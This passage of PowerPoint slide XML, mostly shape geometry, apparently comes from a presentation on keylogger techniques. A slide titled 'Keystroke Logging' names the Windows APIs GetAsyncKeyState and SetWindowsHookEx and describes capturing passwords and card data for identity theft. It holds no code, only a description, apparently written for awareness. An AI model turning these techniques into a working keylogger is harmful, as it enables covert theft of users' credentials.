                  <a:pt x="403346" y="440012"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="36666" y="440012"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16416" y="440012"/>
                  <a:pt x="0" y="423596"/>
                  <a:pt x="0" y="403346"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="36666"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="16430"/>
                  <a:pt x="16430" y="0"/>
                  <a:pt x="36666" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="E0A458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9" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="646268" y="1833383"/>
            <a:ext cx="247507" cy="220006"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="247507" h="220006">
                <a:moveTo>
                  <a:pt x="27501" y="27501"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="12332" y="27501"/>
                  <a:pt x="0" y="39833"/>
                  <a:pt x="0" y="55002"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="165005"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="180173"/>
                  <a:pt x="12332" y="192505"/>
                  <a:pt x="27501" y="192505"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="220006" y="192505"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="235174" y="192505"/>
                  <a:pt x="247507" y="180173"/>
                  <a:pt x="247507" y="165005"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="247507" y="55002"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="247507" y="39833"/>
                  <a:pt x="235174" y="27501"/>
                  <a:pt x="220006" y="27501"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="27501" y="27501"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="34376" y="55002"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="48126" y="55002"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="51908" y="55002"/>
                  <a:pt x="55002" y="58095"/>
                  <a:pt x="55002" y="61877"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="55002" y="75627"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="55002" y="79408"/>
                  <a:pt x="51908" y="82502"/>
                  <a:pt x="48126" y="82502"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="34376" y="82502"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="30595" y="82502"/>
                  <a:pt x="27501" y="79408"/>
                  <a:pt x="27501" y="75627"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="27501" y="61877"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="27501" y="58095"/>
                  <a:pt x="30595" y="55002"/>
                  <a:pt x="34376" y="55002"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="27501" y="103128"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="27501" y="99346"/>
                  <a:pt x="30595" y="96253"/>
                  <a:pt x="34376" y="96253"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="48126" y="96253"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="51908" y="96253"/>
                  <a:pt x="55002" y="99346"/>
                  <a:pt x="55002" y="103128"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="55002" y="116878"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="55002" y="120660"/>
                  <a:pt x="51908" y="123753"/>
                  <a:pt x="48126" y="123753"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="34376" y="123753"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="30595" y="123753"/>
                  <a:pt x="27501" y="120660"/>
                  <a:pt x="27501" y="116878"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="27501" y="103128"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="75627" y="55002"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="89377" y="55002"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="93159" y="55002"/>
                  <a:pt x="96253" y="58095"/>
                  <a:pt x="96253" y="61877"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="96253" y="75627"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="96253" y="79408"/>
                  <a:pt x="93159" y="82502"/>
                  <a:pt x="89377" y="82502"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="75627" y="82502"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="71846" y="82502"/>
                  <a:pt x="68752" y="79408"/>
                  <a:pt x="68752" y="75627"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="68752" y="61877"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="68752" y="58095"/>
                  <a:pt x="71846" y="55002"/>
                  <a:pt x="75627" y="55002"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="68752" y="103128"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="68752" y="99346"/>
                  <a:pt x="71846" y="96253"/>
                  <a:pt x="75627" y="96253"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="89377" y="96253"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="93159" y="96253"/>
                  <a:pt x="96253" y="99346"/>
                  <a:pt x="96253" y="103128"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="96253" y="116878"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="96253" y="120660"/>
                  <a:pt x="93159" y="123753"/>
                  <a:pt x="89377" y="123753"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="75627" y="123753"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="71846" y="123753"/>
                  <a:pt x="68752" y="120660"/>
                  <a:pt x="68752" y="116878"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="68752" y="103128"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="75627" y="137504"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="171880" y="137504"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="175661" y="137504"/>
                  <a:pt x="178755" y="140598"/>
                  <a:pt x="178755" y="144379"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="178755" y="158129"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="178755" y="161911"/>
                  <a:pt x="175661" y="165005"/>
                  <a:pt x="171880" y="165005"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="75627" y="165005"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="71846" y="165005"/>
                  <a:pt x="68752" y="161911"/>
                  <a:pt x="68752" y="158129"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="68752" y="144379"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="68752" y="140598"/>
                  <a:pt x="71846" y="137504"/>
                  <a:pt x="75627" y="137504"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="110003" y="61877"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="110003" y="58095"/>
                  <a:pt x="113097" y="55002"/>
                  <a:pt x="116878" y="55002"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="130629" y="55002"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="134410" y="55002"/>
                  <a:pt x="137504" y="58095"/>
                  <a:pt x="137504" y="61877"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="137504" y="75627"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="137504" y="79408"/>
                  <a:pt x="134410" y="82502"/>
                  <a:pt x="130629" y="82502"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="116878" y="82502"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="113097" y="82502"/>
                  <a:pt x="110003" y="79408"/>
                  <a:pt x="110003" y="75627"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="110003" y="61877"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="116878" y="96253"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="130629" y="96253"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="134410" y="96253"/>
                  <a:pt x="137504" y="99346"/>
                  <a:pt x="137504" y="103128"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="137504" y="116878"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="137504" y="120660"/>
                  <a:pt x="134410" y="123753"/>
                  <a:pt x="130629" y="123753"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="116878" y="123753"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="113097" y="123753"/>
                  <a:pt x="110003" y="120660"/>
                  <a:pt x="110003" y="116878"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="110003" y="103128"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="110003" y="99346"/>
                  <a:pt x="113097" y="96253"/>
                  <a:pt x="116878" y="96253"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="151254" y="61877"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="151254" y="58095"/>
                  <a:pt x="154348" y="55002"/>
                  <a:pt x="158129" y="55002"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="171880" y="55002"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="175661" y="55002"/>
                  <a:pt x="178755" y="58095"/>
                  <a:pt x="178755" y="61877"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="178755" y="75627"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="178755" y="79408"/>
                  <a:pt x="175661" y="82502"/>
                  <a:pt x="171880" y="82502"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="158129" y="82502"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="154348" y="82502"/>
                  <a:pt x="151254" y="79408"/>
                  <a:pt x="151254" y="75627"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="151254" y="61877"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="158129" y="96253"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="171880" y="96253"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="175661" y="96253"/>
                  <a:pt x="178755" y="99346"/>
                  <a:pt x="178755" y="103128"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="178755" y="116878"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="178755" y="120660"/>
                  <a:pt x="175661" y="123753"/>
                  <a:pt x="171880" y="123753"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="158129" y="123753"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="154348" y="123753"/>
                  <a:pt x="151254" y="120660"/>
                  <a:pt x="151254" y="116878"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="151254" y="103128"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="151254" y="99346"/>
                  <a:pt x="154348" y="96253"/>
                  <a:pt x="158129" y="96253"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="192505" y="61877"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="192505" y="58095"/>
                  <a:pt x="195599" y="55002"/>
                  <a:pt x="199380" y="55002"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="213131" y="55002"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="216912" y="55002"/>
                  <a:pt x="220006" y="58095"/>
                  <a:pt x="220006" y="61877"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="220006" y="75627"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="220006" y="79408"/>
                  <a:pt x="216912" y="82502"/>
                  <a:pt x="213131" y="82502"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="199380" y="82502"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="195599" y="82502"/>
                  <a:pt x="192505" y="79408"/>
                  <a:pt x="192505" y="75627"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="192505" y="61877"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="199380" y="96253"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="213131" y="96253"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="216912" y="96253"/>
                  <a:pt x="220006" y="99346"/>
                  <a:pt x="220006" y="103128"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="220006" y="116878"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="220006" y="120660"/>
                  <a:pt x="216912" y="123753"/>
                  <a:pt x="213131" y="123753"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="199380" y="123753"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="195599" y="123753"/>
                  <a:pt x="192505" y="120660"/>
                  <a:pt x="192505" y="116878"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="192505" y="103128"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="192505" y="99346"/>
                  <a:pt x="195599" y="96253"/>
                  <a:pt x="199380" y="9625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0" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1136698" y="1723380"/>
            <a:ext cx="4830965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4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Keystroke Logging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1136698" y="2053389"/>
            <a:ext cx="4739296" cy="843356"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4739296" h="843356">
                <a:moveTo>
                  <a:pt x="36669" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4702627" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4722879" y="0"/>
                  <a:pt x="4739296" y="16417"/>
                  <a:pt x="4739296" y="36669"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4739296" y="806687"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4739296" y="826939"/>
                  <a:pt x="4722879" y="843356"/>
                  <a:pt x="4702627" y="843356"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="36669" y="843356"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16417" y="843356"/>
                  <a:pt x="0" y="826939"/>
                  <a:pt x="0" y="806687"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="36669"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="16431"/>
                  <a:pt x="16431" y="0"/>
                  <a:pt x="36669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2" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1246701" y="2181610"/>
            <a:ext cx="1191699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GetAsyncKeyState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168767" y="2163392"/>
            <a:ext cx="595850" cy="220006"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="595850" h="220006">
                <a:moveTo>
                  <a:pt x="36668" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="559181" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="579419" y="0"/>
                  <a:pt x="595850" y="16431"/>
                  <a:pt x="595850" y="36668"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="595850" y="183338"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="595850" y="203589"/>
                  <a:pt x="579433" y="220006"/>
                  <a:pt x="559181" y="220006"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="36668" y="220006"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16431" y="220006"/>
                  <a:pt x="0" y="203575"/>
                  <a:pt x="0" y="183338"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="36668"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="16431"/>
                  <a:pt x="16431" y="0"/>
                  <a:pt x="36668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4" name="Text 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5168767" y="2163392"/>
            <a:ext cx="650851" cy="220006"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="73335" tIns="36668" rIns="73335" bIns="36668" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="866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46701" y="2419950"/>
            <a:ext cx="4583459" cy="36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Polls each key's state in real-time, capturing every keystroke including passwords and credit cards.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1136698" y="2969965"/>
            <a:ext cx="4739296" cy="843356"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4739296" h="843356">
                <a:moveTo>
                  <a:pt x="36669" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4702627" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4722879" y="0"/>
                  <a:pt x="4739296" y="16417"/>
                  <a:pt x="4739296" y="36669"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4739296" y="806687"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4739296" y="826939"/>
                  <a:pt x="4722879" y="843356"/>
                  <a:pt x="4702627" y="843356"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="36669" y="843356"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16417" y="843356"/>
                  <a:pt x="0" y="826939"/>
                  <a:pt x="0" y="806687"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="36669"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="16431"/>
                  <a:pt x="16431" y="0"/>
                  <a:pt x="36669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7" name="Text 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1246701" y="3098185"/>
            <a:ext cx="1191699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SetWindowsHookEx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168767" y="3079968"/>
            <a:ext cx="595850" cy="220006"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="595850" h="220006">
                <a:moveTo>
                  <a:pt x="36668" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="559181" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="579419" y="0"/>
                  <a:pt x="595850" y="16431"/>
                  <a:pt x="595850" y="36668"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="595850" y="183338"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="595850" y="203589"/>
                  <a:pt x="579433" y="220006"/>
                  <a:pt x="559181" y="220006"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="36668" y="220006"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16431" y="220006"/>
                  <a:pt x="0" y="203575"/>
                  <a:pt x="0" y="183338"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="36668"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="16431"/>
                  <a:pt x="16431" y="0"/>
                  <a:pt x="36668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19" name="Text 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5168767" y="3079968"/>
            <a:ext cx="650851" cy="220006"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="73335" tIns="36668" rIns="73335" bIns="36668" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="866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246701" y="3336525"/>
            <a:ext cx="4583459" cy="36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Installs global keyboard hooks for low-level keystroke interception across all applications.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1155032" y="3923208"/>
            <a:ext cx="4720962" cy="660018"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4720962" h="660018">
                <a:moveTo>
                  <a:pt x="36668" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4684292" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4704544" y="0"/>
                  <a:pt x="4720962" y="16418"/>
                  <a:pt x="4720962" y="36671"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4720962" y="623347"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4720962" y="643600"/>
                  <a:pt x="4704544" y="660018"/>
                  <a:pt x="4684292" y="660018"/>
                </a:cubicBez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E0A458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2" name="Shape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1155032" y="3923208"/>
            <a:ext cx="36668" cy="660018"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="36668" h="660018">
                <a:moveTo>
                  <a:pt x="36668" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="36668" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36668" y="660018"/>
                </a:ln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3" name="Shape 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1301702" y="4062547"/>
            <a:ext cx="146671" cy="146671"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="146671" h="146671">
                <a:moveTo>
                  <a:pt x="73335" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="77546" y="0"/>
                  <a:pt x="81414" y="2320"/>
                  <a:pt x="83419" y="6016"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="145296" y="120602"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="147215" y="124154"/>
                  <a:pt x="147129" y="128451"/>
                  <a:pt x="145066" y="131918"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="143004" y="135384"/>
                  <a:pt x="139251" y="137504"/>
                  <a:pt x="135212" y="137504"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11459" y="137504"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7419" y="137504"/>
                  <a:pt x="3695" y="135384"/>
                  <a:pt x="1604" y="131918"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-487" y="128451"/>
                  <a:pt x="-544" y="124154"/>
                  <a:pt x="1375" y="120602"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="63252" y="6016"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="65257" y="2320"/>
                  <a:pt x="69124" y="0"/>
                  <a:pt x="73335" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="73335" y="48126"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="69525" y="48126"/>
                  <a:pt x="66460" y="51192"/>
                  <a:pt x="66460" y="55002"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="66460" y="87086"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="66460" y="90896"/>
                  <a:pt x="69525" y="93961"/>
                  <a:pt x="73335" y="93961"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="77145" y="93961"/>
                  <a:pt x="80211" y="90896"/>
                  <a:pt x="80211" y="87086"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="80211" y="55002"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="80211" y="51192"/>
                  <a:pt x="77145" y="48126"/>
                  <a:pt x="73335" y="48126"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="80984" y="110003"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="81158" y="107164"/>
                  <a:pt x="79742" y="104463"/>
                  <a:pt x="77308" y="102991"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="74875" y="101518"/>
                  <a:pt x="71825" y="101518"/>
                  <a:pt x="69391" y="102991"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="66957" y="104463"/>
                  <a:pt x="65541" y="107164"/>
                  <a:pt x="65715" y="110003"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="65541" y="112842"/>
                  <a:pt x="66957" y="115543"/>
                  <a:pt x="69391" y="117015"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="71825" y="118488"/>
                  <a:pt x="74875" y="118488"/>
                  <a:pt x="77308" y="117015"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="79742" y="115543"/>
                  <a:pt x="81158" y="112842"/>
                  <a:pt x="80984" y="110003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4" name="Text 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1519641" y="4033211"/>
            <a:ext cx="4319686" cy="440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E1E3E6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Impact:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1155" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E1E3E6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Captures credentials, financial data, and personal info for identity theft.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70343" y="5415586"/>
            <a:ext cx="5644988" cy="1437373"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5644988" h="1437373">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5644988" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5644988" y="1437373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1437373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="E0A458">
              <a:alpha val="10196"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="10160">
            <a:solidFill>
              <a:srgbClr val="E0A458">
                <a:alpha val="40000"/>
              </a:srgbClr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26" name="Shape 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="555057" y="5602589"/>
            <a:ext cx="160421" cy="183338"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="160421" h="183338">
                <a:moveTo>
                  <a:pt x="160421" y="73693"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="155121" y="77203"/>
                  <a:pt x="149034" y="80031"/>
                  <a:pt x="142696" y="82287"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="125866" y="88303"/>
                  <a:pt x="103772" y="91669"/>
                  <a:pt x="80211" y="91669"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="56649" y="91669"/>
                  <a:pt x="34519" y="88267"/>
                  <a:pt x="17725" y="82287"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11423" y="80031"/>
